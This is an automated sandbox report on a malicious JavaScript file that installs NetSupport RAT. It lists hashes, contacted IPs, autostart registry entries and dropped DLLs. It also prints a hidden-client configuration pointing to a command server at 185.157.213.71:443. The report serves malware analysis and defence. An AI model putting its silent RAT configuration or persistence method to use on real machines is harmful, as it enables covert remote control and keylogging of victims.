                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                45.155.249.215
                                                                unknownGermany
                                                                34549MEER-ASmeerfarbigGmbHCoKGDEtrue
                                                                104.26.0.231
                                                                geo.netsupportsoftware.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                185.157.213.71
                                                                unknownSpain
                                                                50129TVHORADADAEStrue
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1591022
                                                                Start date and time:2025-01-14 16:19:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 9m 31s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                Number of analysed new started processes analysed:9
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • GSI enabled (Javascript)
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Payment_243.js
                                                                Detection:MAL
                                                                Classification:mal100.rans.evad.winJS@5/26@1/3
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 80%
                                                                • Number of executed functions: 108
                                                                • Number of non-executed functions: 263
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .js
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                TimeTypeDescription
                                                                07:21:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\x225qa0\client32.exe
                                                                07:21:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\x225qa0\client32.exe
                                                                10:20:16API Interceptor342x Sleep call for process: wscript.exe modified
                                                                10:21:14API Interceptor778015x Sleep call for process: client32.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                104.26.0.231d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                geo.netsupportsoftware.comd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 104.26.0.231
                                                                d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 104.26.1.231
                                                                file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                • 104.26.0.231
                                                                5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                • 104.26.0.231
                                                                Merge.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 104.26.1.231
                                                                lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 104.26.0.231
                                                                Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                • 104.26.0.231
                                                                5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 104.26.1.231
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                MEER-ASmeerfarbigGmbHCoKGDEhttps://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglowGet hashmaliciousHTMLPhisherBrowse
                                                                • 80.77.25.196
                                                                Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                • 5.1.66.185
                                                                payload.exeGet hashmaliciousMetasploitBrowse
                                                                • 45.155.249.178
                                                                test1.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.155.249.178
                                                                uC4EETMDcz.exeGet hashmaliciousSystemBCBrowse
                                                                • 45.155.249.199
                                                                cNF6fXdjPw.dllGet hashmaliciousSocks5SystemzBrowse
                                                                • 45.155.250.225
                                                                x86_64.elfGet hashmaliciousUnknownBrowse
                                                                • 45.90.96.167
                                                                arm.elfGet hashmaliciousUnknownBrowse
                                                                • 45.90.96.167
                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                • 45.90.96.167
                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 45.90.96.167
                                                                CLOUDFLARENETUShttp://vionicstore.shopGet hashmaliciousUnknownBrowse
                                                                • 104.18.73.116
                                                                http://yourexcellency.activehosted.comGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
                                                                • 172.67.197.240
                                                                mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                • 172.67.150.129
                                                                https://mercedesinsua.com.ar/?infox=Ymxha2Uuc2lyZ29AY290ZXJyYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                • 188.114.96.3
                                                                http://secure.ezpassbgy.top/payGet hashmaliciousUnknownBrowse
                                                                • 104.21.15.205
                                                                https://2ol.itectaxice.ru/Qm75/Get hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                                • 172.68.102.177
                                                                https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                                                                • 188.114.96.3
                                                                https://bankersonline.emlnk1.com/lt.php?x=3DZy~GDKVXafEpOq0AE4hRad~XEkk_HzluhlXXTGVXjNDHz~_Uy.0eht1H_zk_D2kvY3bHHJJ3ab62Get hashmaliciousUnknownBrowse
                                                                • 104.16.117.116
                                                                TVHORADADAEShttps://gthlcanada.comGet hashmaliciousUnknownBrowse
                                                                • 185.76.79.50
                                                                http://indyhumane.orgGet hashmaliciousUnknownBrowse
                                                                • 185.76.79.50
                                                                garm7.elfGet hashmaliciousMiraiBrowse
                                                                • 156.67.60.69
                                                                goarm7.elfGet hashmaliciousMiraiBrowse
                                                                • 156.67.60.72
                                                                nrsh4.elfGet hashmaliciousMiraiBrowse
                                                                • 156.67.60.72
                                                                eppc.elfGet hashmaliciousMiraiBrowse
                                                                • 156.67.60.30
                                                                lDO4WBEQyL.exeGet hashmaliciousGO BackdoorBrowse
                                                                • 185.157.213.253
                                                                nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                • 156.67.60.38
                                                                https://agradeahead.com/Get hashmaliciousUnknownBrowse
                                                                • 185.76.79.50
                                                                http://productfocus.comGet hashmaliciousUnknownBrowse
                                                                • 185.76.79.50
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\ProgramData\x225qa0\HTCTL32.DLL5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                  Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                    hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                      Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                        update.jsGet hashmaliciousNetSupport RATBrowse
                                                                          Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                            update.jsGet hashmaliciousNetSupport RATBrowse
                                                                              updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                  Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):2845498
                                                                                    Entropy (8bit):7.997717653428638
                                                                                    Encrypted:true
                                                                                    SSDEEP:49152:b7X1ZldlEDThXBJOhHyx6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRpykTo:X1wFXa4hRFY89YYc9jh23redpmQRZCP7
                                                                                    MD5:4C1AFE882E6D7C945A8397DCB02A2478
                                                                                    SHA1:85BA754BB1515A1EDC4054A8A3396C238DCE2B7E
                                                                                    SHA-256:67F6FC03CD53FB2A5AB17B97CAAE29B4FD0E0AFB7ADF4C9C64CDB2F7F99D03D4
                                                                                    SHA-512:A1778AE5F89DBBC57AC70C8A8B1CC419DFE015C7F9C9A58AC9957AB3723EDF812A4681CAF167EC63D0EA571448DC01FE01E5B12C5538C98B6BA404CAD2F79B0F
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:PK........Dw*Z................install/PK.........P)Z..Q~....|.......install/5B8FEB2AF817493Es.....TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......a*si........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....|..t......&8u....xL.Y$.)..Z4At...W.*.....Z*..z7.'2.m...ZO...)..w ..:.L.gp.....y...6
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):328056
                                                                                    Entropy (8bit):6.7547459359511395
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                    MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                    SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                    SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                    SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\HTCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 16%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: 5j0fix05fy.js, Detection: malicious, Browse
                                                                                    • Filename: Update.js, Detection: malicious, Browse
                                                                                    • Filename: hkpqXovZtS.exe, Detection: malicious, Browse
                                                                                    • Filename: Update.js, Detection: malicious, Browse
                                                                                    • Filename: update.js, Detection: malicious, Browse
                                                                                    • Filename: Update.js, Detection: malicious, Browse
                                                                                    • Filename: update.js, Detection: malicious, Browse
                                                                                    • Filename: updates.js, Detection: malicious, Browse
                                                                                    • Filename: updates.js, Detection: malicious, Browse
                                                                                    • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):195
                                                                                    Entropy (8bit):4.924914741174998
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                                    MD5:E9609072DE9C29DC1963BE208948BA44
                                                                                    SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                                    SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                                    SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:Generic INItialization configuration [Features]
                                                                                    Category:dropped
                                                                                    Size (bytes):6458
                                                                                    Entropy (8bit):4.645519507940197
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                    MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                    SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                    SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                    SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                    Malicious:false
                                                                                    Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):18808
                                                                                    Entropy (8bit):6.292094060787929
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                    MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                    SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                    SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                    SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\PCICHEK.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 18%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3740024
                                                                                    Entropy (8bit):6.527276298837004
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                    MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                    SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                    SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                    SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\x225qa0\PCICL32.DLL, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\PCICL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 18%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):396664
                                                                                    Entropy (8bit):6.80911343409989
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                                    MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                                    SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                                    SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                                    SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\TCCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):103824
                                                                                    Entropy (8bit):6.674952714045651
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                                    MD5:C4F1B50E3111D29774F7525039FF7086
                                                                                    SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                                    SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                                    SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\client32.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):676
                                                                                    Entropy (8bit):5.438750337777859
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:XWJxS2hz7YU+Sj8ZGShR8kkivlnxOZ7+DP981E7GXoKIDWQCYnmSu+L8AR:XWJI2hzEPI8ZNR8pivlnxOoG1fXtID/F
                                                                                    MD5:95C974137591C8018AC92DEA29AA416C
                                                                                    SHA1:E0808277D7FED2B4DB1176FA4FA79DA420BFD865
                                                                                    SHA-256:7F92999396927D24370F6FE3D2E8EA408C9917D34F42C0205EA3F3296B6C04F4
                                                                                    SHA-512:767AE7FFCA47BB8F8170C44C66EEBF9623412A5D2E07D67FC3FCF1AB5F6CE49C08A68D91E00EBD0B52C052AD5454E57B16A28BAED8B1E0B2C585448EAE8AE1E0
                                                                                    Malicious:false
                                                                                    Preview:0x33b1a391....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=185.157.213.71:443..gsk=FI:N>AABED9I<L?N..gskmode=0..GSK=FI:N>AABED9I<L?N..GSKX=FI:N>AABED9I<L?N..
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):576
                                                                                    Entropy (8bit):3.74490007255712
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:bHCsUaXhIi90pgIJKlkQIkzDTze/W2rXJ0cl/7:biERIiMdMkvkm/WgXW07
                                                                                    MD5:0DDC9B893EA3AF54D152F94410653A9D
                                                                                    SHA1:3C7E16964DFFD7342AE931E38E00F67DC0E4C307
                                                                                    SHA-256:0128461FAC52A5DEEC5B0F0410928E0C2AFC1AB710990BDEDEA47A68EB5ECC3D
                                                                                    SHA-512:24463708FBDACFF90FCB4964A6335687D8EEB49094E6154D0AA37FD9E8DE7D870396E424756465F4F86EDF0BAA6138B7F52035559A04FB243C29D42395AE92A2
                                                                                    Malicious:false
                                                                                    Preview:...@....................@...............@...X...............`... ...i.y.........SetupMetrics........i.y..Yd.X.......A.......e............,.........C*.3...................C*.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.0.......A...................a.#........z..?...................z..?................Setup.Install.LzmaUnPackStatus_SetupExePatch....X...i.y.[".............................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1696
                                                                                    Entropy (8bit):4.244464042583567
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:bixIiMdMA/JWo/XkWHUVyHBF+J4X8XRL1g:bi4MQgW8yByv
                                                                                    MD5:3E4B8369C88B5B5561EF39F297AE5B7E
                                                                                    SHA1:128D40127E1BCD1DC3A26DF7ED685AD95482F2EA
                                                                                    SHA-256:3774458149778D9527E0A9ACE07B42EF609F0BB1E856E6C2DFD0B7CBD8B09F73
                                                                                    SHA-512:65C3DC909AA69121EF46A79D8F62D234D69B5856796FDD5F4AE4FC030BC0FB953175577CC34B41B38E2C39D44CBCB97DD34628C074B74C189CFD522B57602F2C
                                                                                    Malicious:false
                                                                                    Preview:...@....................@...................................`... ...i.y.........SetupMetrics........i.y..Yd.X.......A.......e............,.........C*.3...................C*.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.H.......A...................a.#.....y....)..................y....)..................Setup.Install.LzmaUnPackStatus_CompressedChromeArchive..X...i.y.[".................................................................................i.y..Yd.........A...................a.#.........]l....................]l................Setup.Install.LzmaUnPackStatus_UncompressedChromeArchive........x...i.y..Yd........A.......P...Q...`...l..?....]......Q................]......Q................Setup.Install.Result....X...i.y.[".............................................................................................................................
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):344
                                                                                    Entropy (8bit):3.4385863420423908
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:bHCsLlXj9IiIwkttBtw++CMwCkXxL4bM5/zGJOg4lTQwlroL:bHCsRXhIiq50pgIJKlkQY
                                                                                    MD5:1B7CDDDFB06152AE01F12D9F253237D6
                                                                                    SHA1:1EF358781A086A0727F4FA95CD53510EB328BC52
                                                                                    SHA-256:FD668D6EDCF6B6CC176EDD9BF7B0D7F1881FE2F0D94EBAE656127C27A359550E
                                                                                    SHA-512:4705C93B233BE92DD2D04649D404B538BC76607BBE655D5E35A739653AC1AF776ECDD12EC1CBF81476070EC5BAE633F891817155014730A06939EFB21BD132EA
                                                                                    Malicious:false
                                                                                    Preview:...@....................@...............X...`...............`... ...i.y.........SetupMetrics........i.y..Yd.0.......A.......e............,.........C*.3...................C*.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e.......
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):24910
                                                                                    Entropy (8bit):5.246760185320695
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:PlBJHEA29f27X0JS4zuPxpO8psP+E7v6xKL:P9b29f27kJSAuPxpO6sP+E7yxKL
                                                                                    MD5:8028AB84D61FC5E00FEEA816E1D1E293
                                                                                    SHA1:73F6340BE4C6B5AF09673DACDF1AAB7405B966AA
                                                                                    SHA-256:3F2EB6455F54365C27829F85DD64CA0BAFAA8577A6C8E79A54A6DD4C67DF6470
